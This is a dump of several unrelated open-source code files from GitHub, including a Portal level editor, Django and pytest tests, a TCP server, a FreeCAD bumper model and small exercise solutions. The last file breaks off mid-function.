elif self.button:\n self.canvas.redraw()\n door = self._get_door(x, y)\n if door:\n self._draw_trigger(self.button, door.center())\n else:\n self._draw_trigger(self.button, Position(x, y))\n\n def mouseup(self, x, y):\n if self.door:\n button = self._get_button(x, y)\n if button and button not in self.door.triggers:\n self.door.triggers.append(button)\n elif self.button:\n door = self._get_door(x, y)\n if door and self.button not in door.triggers:\n door.triggers.append(self.button)\n self.door = None\n self.button = None\n self.canvas.redraw()\n\n def _draw_trigger(self, pos1, pos2):\n self.canvas.create_line(pos1.x, pos1.y, pos2.x, pos2.y,\n width=2.0,\n dash=(8, 8),\n fill=colors.TRIGGER)\n\n def _get_door(self, x, y):\n for wall in self.level.walls:\n if isinstance(wall, Door) and wall.center().distance(Position(x, y)) < 0.5:\n return wall\n\n def _get_button(self, x, y):\n for entity in self.level.entities:\n if isinstance(entity, Button) and entity.distance(Position(x, y)) < 0.5:\n return entity\n\nclass EraserTool(Tool):\n name = 'Eraser'\n def setup(self):\n self.last_x = None\n self.last_y = None\n\n def mousedown(self, x, y):\n self._remove_entities(x, y)\n self.canvas.redraw()\n self.last_x = x\n self.last_y = y\n\n def mousemove(self, x, y):\n if self.last_x is not None and self.last_y is not None:\n self._remove_entities(x, y)\n self._remove_walls(self.last_x, self.last_y, x, y)\n self.canvas.redraw()\n self.last_x = x\n self.lats_y = y\n\n def mouseup(self, x, y):\n self.last_x = None\n self.last_y = None\n\n def _remove_entities(self, x, y):\n to_remove = []\n for e in self.level.entities:\n if e.x is not None and e.y is not None and e.distance(Position(x, y)) < 0.2:\n to_remove.append(e)\n for e in to_remove:\n self.level.remove_entity(e)\n\n def _remove_walls(self, x1, y1, x2, y2):\n to_remove = []\n for wall in self.level.walls:\n if wall.intersects(Position(x1, y1), Position(x2, y2)):\n to_remove.append(wall)\n for wall in to_remove:\n self.level.walls.remove(wall)\n\n\n\nTOOLS = [\n PlayerTool,\n GoalTool,\n WallTool,\n PortalWallTool,\n LedgeTool,\n DoorTool,\n GrillTool,\n Portal1Tool,\n Portal2Tool,\n CubeTool,\n ButtonTool,\n TriggerTool,\n EraserTool,\n]\n","repo_name":"michaelelin/portal_planner","sub_path":"portal/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4262653398","text":"import glob\nimport inspect\nimport os.path\nimport pytest\nimport re\nimport shutil\n\nfrom publicprize import debug as ppd\nfrom publicprize import config\nfrom publicprize.debug import pp_t\n\n_request_logger = None\n\n_expect = {\n 'environ': 'some environ',\n 'status': 'some status',\n 'response_headers': 'some headers',\n 'response_data': 'some write',\n 'other': 'hello'\n}\n\ndef _init_debug(test_mode, regex):\n ppd._request_logger = None\n ppd._trace_printer = None\n ppd._app = None\n mock = MockApp()\n mock.config = {\n 'PUBLICPRIZE': {\n 'TRACE': regex,\n 'TEST_MODE': test_mode}}\n ppd.init(mock)\n return mock\n\nclass MockApp(object):\n \n def __init__(self):\n self.wsgi_app = self\n self.called__call__ = 0\n \n def __call__(self, environ, start_response):\n global _expect\n global _request_logger\n self.called__call__ += 1\n start_response(_expect['status'], _expect['response_headers'])\n return _expect['response_data']\n\ndef test_nothing():\n global _request_logger\n mock = _init_debug(0, None)\n assert mock.wsgi_app == mock\n \ndef test_log():\n global _expect\n global _request_logger\n if os.path.exists('debug'):\n shutil.rmtree('debug')\n os.mkdir('debug')\n called_start_response = 0\n mock = _init_debug(1, None)\n _request_logger = ppd.get_request_logger()\n def start_response(status, response_headers, exc_info=None):\n nonlocal called_start_response\n called_start_response += 1\n \n def assert_file(index, suffix):\n name = os.path.join('debug', index + '-' + suffix)\n assert os.path.exists(name), name\n with open(name, 'r') as f:\n actual = f.read()\n assert actual == _expect[suffix], suffix + '=' + actual\n\n response = mock.wsgi_app(_expect['environ'], start_response)\n assert '00000003-response_headers' in _request_logger.last_file_name()\n _request_logger.set_log_dir('new_dir')\n for ignore in response:\n pass\n assert '00000001-response_data' in _request_logger.last_file_name() \n response.close()\n _request_logger.log('hello', 'other')\n\n assert mock.called__call__ == 1\n assert called_start_response == 1\n assert_file('00000001', 'environ')\n assert_file('00000002', 'status')\n assert_file('00000003', 'response_headers')\n assert_file('new_dir/00000001', 'response_data')\n assert_file('new_dir/00000002', 'other')\n _request_logger.log('not written', 'invalid/suffix')\n assert list(glob.glob('debug/*invalid*')) == [], 'found invalid/suffix'\n\ndef test_trace():\n _last_msg = None\n def _init(regex):\n nonlocal _last_msg\n _last_msg = None\n _init_debug(0, regex)\n ppd._trace_printer.write = _write\n\n def _write(msg):\n nonlocal _last_msg\n _last_msg = msg\n\n def expect(msg):\n return './tests/test_debug.py:{}:test_trace {}\\n'.format(inspect.currentframe().f_back.f_lineno - 1, msg)\n\n _init(None)\n pp_t('hello')\n assert None == _last_msg\n\n _init('.')\n pp_t('hello')\n assert expect('hello') == _last_msg \n pp_t('x{}x', ['y'])\n assert expect('xyx') == _last_msg \n\n _init('goodbye')\n pp_t('hello')\n assert None == _last_msg \n pp_t('goodbye')\n assert expect('goodbye') == _last_msg \n \n","repo_name":"biviosoftware/publicprize","sub_path":"tests/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4045944195","text":"\"\"\"\nAquest mòdul serveix per descomprimir l'arxiu twitter_reduced.zip\n\"\"\"\n\nimport os\nimport glob\nimport zipfile\nimport csv\n\n\ndef decompress_data():\n \"\"\"\n Funció per descomprimir l'arxiu twitter_reduced.zip\n Return: twitter_reduced.csv\n \"\"\"\n\n # Definim el directori al arxiu per descomprimir\n zip_files = glob.glob('./data/twitter_reduced.zip')\n if zip_files:\n zip_file = zip_files[0]\n directory = os.path.dirname(zip_file)\n\n # Descomprimim l'arxiu i el guardem a la carpeta data\n with zipfile.ZipFile(zip_file, 'r') as z:\n z.extractall(directory)\n\n print(\"L'arxiu s'ha descomprimit i guardat a la carpeta data\")\n\n\ndef csv_to_list_dict(path_to_file):\n \"\"\"\n Funció per passar un csv a una llista de diccionaris.\n :param path_to_file: Arxiu csv com a input.\n :return: Llista de diccionaris.\n \"\"\"\n # Creem una llista buida\n list_dict = []\n\n # Obrim l'arxiu i el llegim\n with open(path_to_file, 'r', newline='', encoding='utf-8') as f:\n reader = csv.DictReader(f)\n\n # Iterem per cada línia, la passem a diccionari i l'afegim a la llista\n for row in reader:\n list_dict.append(dict(row))\n return list_dict\n","repo_name":"vtierz/pec4","sub_path":"dataset/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24451528309","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Author : xuan\n中位数是一个可将数值集合划分为相等的上下两部分的一个数值。\n如果列表数据的个数是奇数,则列表中间那个数据就是列表数据的中位数;\n如果列表数据的个数是偶数,则列表中间那2个数据的算术平均值就是列表数据的中位数。\n在这个任务里,你将得到一个含有自然数的非空数组(X)。你必须把它分成上下两部分,找到中位数。\n\"\"\"\n\ndef checkio(data):\n new_data = sorted(data)\n if len(data) % 2 != 0:\n return new_data[int(len(data)/2)]\n else:\n return (new_data[len(data)//2 -1] + new_data[len(data)//2])/2\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio([1, 2, 3, 4, 5]) == 3, \"Sorted list\"\n assert checkio([3, 1, 2, 5, 3]) == 3, \"Not sorted list\"\n assert checkio([1, 300, 2, 200, 1]) == 2, \"It's not an average\"\n assert checkio([3, 6, 20, 99, 10, 15]) == 12.5, \"Even length\"\n print(\"Start the long test\")\n assert checkio(list(range(1000000))) == 499999.5, \"Long.\"\n print(\"The local tests are done.\")\n print(checkio([1, 2, 3, 4, 5, 6]))","repo_name":"kxeg/checkio","sub_path":"checkio/Median.py","file_name":"Median.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72598424488","text":"# Problem #1026\n# Author: Dalton Lima @daltonbr\n# 07/04/17\n# https://www.urionlinejudge.com.br/judge/en/problems/view/1026\n\nimport fileinput\n\nfor line in fileinput.input():\n #print(\"line read: \", line)\n value_list = line.split()\n\n # Converting str to int ... with list comprehension\n int_list = line.split()\n int_list = [int(i) for i in int_list]\n\n # ... or we could user map function also\n # int_list = list(map(int, int_list))\n\n # it's a simple bitwise xor (operator ^)\n print(int_list[0] ^ int_list[1])\n","repo_name":"daltonbr/problems","sub_path":"_URI/1026-ToCarryOrNotToCarry/carry.py","file_name":"carry.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6388199832","text":"# tests.py\n# from django.test import TestCase\nfrom django.urls import reverse\nimport pytest\nfrom pytest_django.asserts import assertTemplateUsed # assertQuerysetEqual\nfrom .models import MyUser, Note\n\n\n# Test on correct Routing page:\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_login_route(client):\n response = client.get(reverse(\"login\"))\n assert response.status_code == 200\n assertTemplateUsed(response, \"login.html\")\n assert b\"Register\" in response.content\n\n\n# Test on single Note for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_single_note(client):\n # Create a User in DB\n single_note_user = MyUser.objects.create(\n name=\"User1\", password=\"cryptography_staff_123\", language=\"Polish\", grade=\"Low\"\n )\n\n # Create the User Note in DB:\n new_note = Note.objects.create(\n user_note=single_note_user,\n title=\"Test Note\",\n msg=\"This is a test note\",\n assignee=\"Test User\",\n e_mail=\"Test_Email@ithillel.ua\",\n )\n\n # Access the user's notes page:\n response = client.get(reverse(\"user_info\", kwargs={\"username\": new_note.user_note}))\n assert response.status_code == 200\n assertTemplateUsed(response, \"admin_user_info.html\")\n\n # Check if the note is present in the response:\n assert new_note.title in response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/John/\n # Only user info here and Note titles\n\n\n# Test on three Notes for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_3_notes(client):\n # Create a user in DB:\n multi_note_user = MyUser.objects.create(\n name=\"David\",\n password=\"cryptography_staff_321\",\n language=\"Esperanto\",\n grade=\"Medium\",\n )\n\n # Create a User Note1 in DB:\n new_note1 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Holiday Plans\",\n msg=\"Sunbathe on a beach\",\n assignee=\"Evan Tree\",\n e_mail=\"Test_Email1@ithillel.ua\",\n )\n\n # Create a User Note2 in DB:\n new_note2 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Morning Routine\",\n msg=\"Walk a Dog\",\n assignee=\"Chris Newdawn\",\n e_mail=\"Test_Email2@ithillel.ua\",\n )\n\n # Create a User Note3 in DB:\n new_note3 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Animal Care\",\n msg=\"Give Meds\",\n assignee=\"Samanta Hopper\",\n e_mail=\"Test_Email3@ithillel.ua\",\n )\n\n # Access the user's notes page (\"username\" is same for all 3):\n multi_response = client.get(\n reverse(\"user_info\", kwargs={\"username\": new_note1.user_note})\n )\n assert multi_response.status_code == 200\n assertTemplateUsed(multi_response, \"admin_user_info.html\")\n\n # Check if all 3 notes are present in the response:\n assert (\n new_note1.title and new_note2.title and new_note3.title\n ) in multi_response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/David/\n # Only user info here and Note titles\n","repo_name":"Northman94/PyProZh","sub_path":"Lesson10/organizer10/scheduler/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20030927569","text":"import numpy as np\nimport pandas as pd\nfrom computecost import computecost\nfrom computecost import sigmoid\ndef gradientDesent(X,y,alpha,num_iter):\n \"\"\"X为特征矩阵,y为标签数组,theta为角度,alpha为学习效率,num_iters为所迭代的次数,\n 此函数为梯度算法,返回最小角度和代价函数矩阵\"\"\"\n m, n = X.shape # 样本总量\n theta = np.zeros((n, 1))\n m=len(y)#样本总量\n theta=theta.reshape(-1,1)\n J_history=np.zeros((num_iter,1))#将代价函数矩阵初始为零矩阵\n for iter in range(num_iter):\n s=sigmoid(np.dot(X,theta))#调用sigmoid函数\n theta=theta-alpha*np.dot(X.T,(s-y))/m#梯度函数应用\n J_history[iter][0]=computecost(s,y)#调用代价函数,每次迭代的结果写入,更新矩阵值\n return theta,J_history\n","repo_name":"karagg/tt","sub_path":"logistic/gradientDesent.py","file_name":"gradientDesent.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9880575717","text":"import pandas as pd\n\nfrom dagster import MaterializeResult, MetadataValue, asset\n\n# start_add_signsup_asset\nfrom .resources import DataGeneratorResource\n\n# ...\n\n\n@asset\ndef signups(hackernews_api: DataGeneratorResource) -> MaterializeResult:\n signups = pd.DataFrame(hackernews_api.get_signups())\n\n signups.to_csv(\"data/signups.csv\")\n\n return MaterializeResult(\n metadata={\n \"Record Count\": len(signups),\n \"Preview\": MetadataValue.md(signups.head().to_markdown()),\n \"Earliest Signup\": signups[\"registered_at\"].min(),\n \"Latest Signup\": signups[\"registered_at\"].max(),\n }\n )\n\n\n# end_add_signsup_asset\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/tutorial/connecting/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"70549139689","text":"from typing import Dict\n\n\nclass DisplaySegment(object):\n ON_STR_HORIZ = \"===\"\n OFF_STR_HORIZ = \"___\"\n ON_STR_VERT = \"B\"\n OFF_STR_VERT = \"|\"\n\n def __init__(self):\n self.anode = True # type: bool\n self.cathodes = {chr(c): False for c in range(ord('a'), ord('f') + 1)} # type: Dict[str: bool]\n self.cathodes[\"dp\"] = False\n\n def __repr__(self):\n r = \".%s.\\n%s...%s\\n%s...%s\\n.%s%s\" % \\\n (self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n self.ON_STR_VERT if self.cathodes[\"f\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"b\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"e\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"c\"] else self.OFF_STR_VERT,\n self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n \"*\" if self.cathodes[\"dp\"] else \".\")\n return r\n\n\nclass SevenSegmentDisplay(object):\n def __init__(self):\n self.segments = [DisplaySegment() for _ in range(0, 8)]\n","repo_name":"Vadman97/PicoSim","sub_path":"hardware_sim/seven_segment_display.py","file_name":"seven_segment_display.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33172266248","text":"import supalib\n\nEPS = 0.01\nTOLE = 0.2\n\nBUMBER_STICK_SEPARATION = 30\nBUMBER_STICK_XSIZE = 10\nBUMBER_STICK_YSIZE = 10\nBUMBER_STICK_LEN = 120\n\nMOUNT_B_OFFSET = -70\nMOUNT_THICKNESS = 4\nMOUNT_YSIZE = 30\nMOUNT_STIC_SIZE = 2*MOUNT_THICKNESS + BUMBER_STICK_YSIZE\n\n\ndef crete_single_mount( with_hole ):\n raw = supalib.create_box( size=(MOUNT_STIC_SIZE , MOUNT_YSIZE , MOUNT_STIC_SIZE ), place = (0, 0, 0 ) )\n \n if with_hole == False:\n offset_y = -EPS\n else:\n offset_y = MOUNT_THICKNESS*0.5\n \n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_YSIZE + 2*EPS, BUMBER_STICK_YSIZE + 2*TOLE ), place = (MOUNT_THICKNESS - TOLE, offset_y, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\ndef create_base_mount():\n raw = supalib.create_box( place=(-BUMBER_STICK_SEPARATION - EPS, -EPS,-TOLE), size=( 2*BUMBER_STICK_SEPARATION + 2*EPS, MOUNT_YSIZE + 2*EPS, MOUNT_THICKNESS ) )\n BOLT_SEP = MOUNT_YSIZE/4.0\n hole1 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 + BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n hole2 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 - BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n holes = supalib.create_union( (hole1, hole2 ) )\n return supalib.create_cut( raw, holes )\n\n\ndef create_full_part( with_hole, label ):\n base = create_base_mount() \n mount_1 = crete_single_mount( with_hole )\n mount_2 = crete_single_mount( with_hole )\n supalib.relocate( mount_1, place=( BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE, 0, -EPS ) )\n supalib.relocate( mount_2, place=( -BUMBER_STICK_SEPARATION, 0, -EPS ) )\n mount = supalib.create_union( ( mount_1, mount_2, base ) )\n mount.Label = label\n return mount\n\nSTICK_PLACE_A=(BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 - TOLE*0.0 , MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\nSTICK_PLACE_B=(-BUMBER_STICK_SEPARATION + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 + TOLE*0.0, MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\ndef create_stick():\n thick = (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5\n bsize = BUMBER_STICK_XSIZE - 2 *TOLE\n b1 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_A )\n b2 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_B )\n b3 = supalib.create_box( size=( 2*BUMBER_STICK_SEPARATION - 2*EPS - MOUNT_STIC_SIZE + bsize*0.25, bsize, bsize), place=( bsize*0.25 + -BUMBER_STICK_SEPARATION + thick + EPS, -BUMBER_STICK_XSIZE - TOLE, MOUNT_THICKNESS ) )\n b1 = supalib.create_fillet( b1 )\n b2 = supalib.create_fillet( b2 )\n part = supalib.create_union( ( b1,b2,b3) )\n part.Label = \"Stick\"\n return part\n\ndef create_bumber():\n BUMBER_SIZE_MINUS = 60 + BUMBER_STICK_SEPARATION\n BUMBER_SIZE_PLUS = 30 + BUMBER_STICK_SEPARATION\n BUMBER_MOUNT_SIZE = BUMBER_STICK_XSIZE + 2*MOUNT_THICKNESS + TOLE\n def create_bmount():\n raw = supalib.create_box( size=( BUMBER_MOUNT_SIZE, MOUNT_THICKNESS, BUMBER_MOUNT_SIZE) )\n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_THICKNESS*0.5, BUMBER_STICK_XSIZE + 2*TOLE ), place=(MOUNT_THICKNESS - TOLE, 0.0, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\n m1 = create_bmount()\n m2 = create_bmount()\n \n s0 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,2*BUMBER_MOUNT_SIZE + MOUNT_THICKNESS) )\n s1 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,BUMBER_MOUNT_SIZE - EPS ) )\n s2 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,-MOUNT_THICKNESS - EPS) )\n s3 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n hsize = ( MOUNT_THICKNESS, MOUNT_THICKNESS, 3*(MOUNT_THICKNESS + BUMBER_MOUNT_SIZE) + MOUNT_THICKNESS + EPS )\n d1 = supalib.create_box( size=hsize, place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d2 = supalib.create_box( size=hsize, place=( BUMBER_SIZE_PLUS - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n d3 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d4 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION + BUMBER_MOUNT_SIZE ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d5 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d6 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION - BUMBER_MOUNT_SIZE - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n \n d7 = supalib.create_box( size=hsize, place=( 0.5*( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS - BUMBER_SIZE_MINUS) ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n #d5 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n #d6 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION -BUMBER_MOUNT_SIZE -MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n\n sup = supalib.create_union( (s0, s1,s2,s3,d1,d2,d3, d4, d5, d6, d7 ) )\n # ,d5,d6\n supalib.relocate( m1, place=(STICK_PLACE_A[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( m2, place=(STICK_PLACE_B[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( sup, place=(0.0, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n bumber = supalib.create_union( (sup, m1, m2 ) )\n bumber.Label=\"Bumber\"\n return bumber\n \n \nbumber = create_bumber() \nmount_a = create_full_part ( False, \"Mount_front\" )\nmount_b = create_full_part ( True, \"Mount_rear\" )\nsupalib.relocate( mount_b, place=( 0.0, MOUNT_B_OFFSET , 0.0) )\n\nstick = create_stick()\n\n\nfor x in [ bumber, mount_a, mount_b, stick ]:\n supalib.creta_mesh_from( x )\n\nsupalib.finish()\n\n\n\n\n","repo_name":"susundberg/zephyr-robot-supa2019","sub_path":"3d_parts/robot_bumber_mount_a.py","file_name":"robot_bumber_mount_a.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"17111691253","text":"#!/usr/bin/env python3\n# *_* coding: utf-8 *_*\n\n\"\"\"TCP Server library\"\"\"\n\nimport socket\nimport select\nimport time\nimport getmac\n\nclass new_connection(Exception):\n \"\"\"TCP: New connection detected\"\"\"\n pass\n\nclass address_does_not_exist(Exception):\n \"\"\"TCP: Address does exist in dictionary\"\"\"\n def __init__(self, *args):\n super().__init__(*args)\n\ndef get_ip():\n \"\"\"Find local IP of the current network interface, avoid 127.0.0.1\"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\n\ndef receive_message(client_socket):\n \"\"\"Recive message from client_socket\"\"\"\n try:\n mess = client_socket.recv(1024)\n if (not len(mess)):\n return False\n elif (len(mess) <= 2) or (mess == '\\r\\n'):\n return\n return mess\n \n except:\n return False\n\nclass tcp_server:\n \"\"\"Create a TCP/IP Server\"\"\"\n def __init__(self,IP,PORT):\n self.IP = IP\n self.PORT = PORT\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setblocking(0)\n self.server_socket.bind((self.IP, self.PORT))\n self.server_socket.listen(5)\n self.sockets_list = [self.server_socket]\n self.socket_list_by_mac = {}\n self.id_dict = {}\n self.msg = {}\n self.read_sockets = []\n self.write_sockets = []\n self.exception_sockets = []\n self.mac_list = []\n \n\n def update_sockets_list(self):\n \"\"\"Update sockets list to read_sockets, write_sockets, exception_sockets\"\"\"\n self.read_sockets, self.write_sockets, self.exception_sockets = select.select(self.sockets_list, self.sockets_list, [], 0)\n\n def check_read_sockets(self):\n \"\"\"Handle new connection after updating socket lists\"\"\" \n for notified_socket in self.read_sockets:\n if notified_socket == self.server_socket:\n raise new_connection('New Connection')\n\n def new_socket_handler(self):\n \"\"\"New socket handler\"\"\"\n client_socket, client_address = self.server_socket.accept()\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n client_socket.setblocking(0)\n self.sockets_list.append(client_socket)\n logic = True\n for mac in self.mac_list:\n if mac == client_mac:\n client_socket.send(b\"Welcome back!\")\n logic = False\n try:\n self.sockets_list.remove(self.socket_list_by_mac[mac])\n except ValueError:\n pass\n self.socket_list_by_mac[mac]=client_socket\n return\n\n if logic:\n raise address_does_not_exist(client_socket, client_address)\n\n def create_new_socket(self, client_socket, client_address, id):\n \"\"\"Create new TCP socket\"\"\"\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n self.id_dict[client_mac] = id\n self.mac_list.append(client_mac)\n self.socket_list_by_mac[client_mac] = client_socket\n \n def send_all(self, mess):\n \"\"\"THIS FUNCTION IS WRONG\"\"\"\n for key in self.id_dict:\n if (self.id_dict[key] != 'UPS') and (self.id_dict[key] != 'AC') and (key != self.server_socket):\n key.send(mess.encode('utf-8'))\n\n def therm_parsing(self, mess):\n \"\"\"Split a message from a client into 2 variables by spaces\"\"\"\n mess_list = mess.split()\n if len(mess_list) == 2:\n return mess_list[0], mess_list[1]\n\n def recv_all(self):\n \"\"\"Receive all messages from clients and parse as therm\"\"\"\n self.update_sockets_list()\n return_list = []\n for notified_socket in self.read_sockets:\n if notified_socket != self.server_socket:\n client_mac = getmac.get_mac_address(ip = notified_socket.getpeername()[0])\n if self.id_dict[client_mac] != 'UPS':\n mess_dict = {'ID':self.id_dict[client_mac]}\n message = receive_message(notified_socket)\n if message is False:\n self.sockets_list.remove(notified_socket)\n continue\n elif message == None:\n continue\n message = message.strip()\n try:\n temp, humid = self.therm_parsing(message)\n mess_dict['Temp'] = temp.decode('utf-8')\n mess_dict['Humid'] = humid.decode('utf-8')\n return_list.append(mess_dict)\n except TypeError:\n return_list = []\n\n return return_list","repo_name":"nguyenmthien/VGUServer_archive","sub_path":"ESP8266/PowerEfficient/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23544944552","text":"\"\"\"\ncode to explore families of finite rod sets\n\nUsage: uncomment fragments after the line\n### code to execute here\n\nlast modified: 12/31/2021\n\n@author: Ethan Bolker\n\nto do: \n\nRefactor to get remove translations to and from bitstrings. \nRod sets are now specified by lists of rod lengths.\n\nImprove plotroots so that it plots all the circles corresponding to \nthe roots of the minimal polynomial, not just the one for the growth \nrate.\n- problem same as below\n\nAdd to rodsetattributes\n data.shiftpoly({\"shiftpoly\":spolystr})\ncontaining the shift polynomial - that's the\nquotient of the cpoly and the minimal poly.\n- problem: the code in rodsetattributes knows only the\n growth rate, not the factor of the cpoly that's the\n minimal polynomial. If we can't easily figure this\n out here, we might have to do it in findfamilies, when we \n know the minimal polynomial because it's (usually) the\n first one encountered.\n\"\"\"\nimport sys\nimport math\nfrom utilities import *\nfrom multi import multi\nfrom convolve import p2t\nfrom sympy import roots as sroots\nfrom sympy import solve as solve\nfrom sympy import factor as factor\nfrom numpy import *\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport matplotlib.pyplot as plt\n\nfrom itertools import combinations\n\ndef mygcd(mylist):\n if len(mylist) == 1:\n return mylist[0]\n else:\n return math.gcd( mylist[0],mygcd(mylist[1:]))\n\n# zzzzzzzzz\ndef build_recursion_polynomial(spots):\n ''' from input spots = [1,2,2,2,4] build recursion polynomial\n x**3 - 3*x**2 - x**1 - 1\n ''' \n coeffs = build_cuisenaire_poly_coefficients(spots)\n polystr = str(coeffs[0])\n for i in range(1,len(coeffs)-1):\n if coeffs[i] != 0:\n c = coeffs[i]\n if c > 0:\n sign = str('+')\n else:\n sign = str('-') \n polystr += sign + str(abs(c)) + '*x**' + str(i)\n polystr += '+ x**' + str(len(coeffs)-1)\n return polystr\n\n# deprecated\ndef xxxbuild_recursion_polynomial_coeffs(bits):\n ''' from input bit string 1011 build recursion polynomial\n coefficients as list [-1, -1, 0, -1, 1].\n Coefficients from constant term to degree 4.\n '''\n n = len(bits)\n coeffs = [1]\n for j in range(n)[:-1]:\n b = int(bits[j])\n 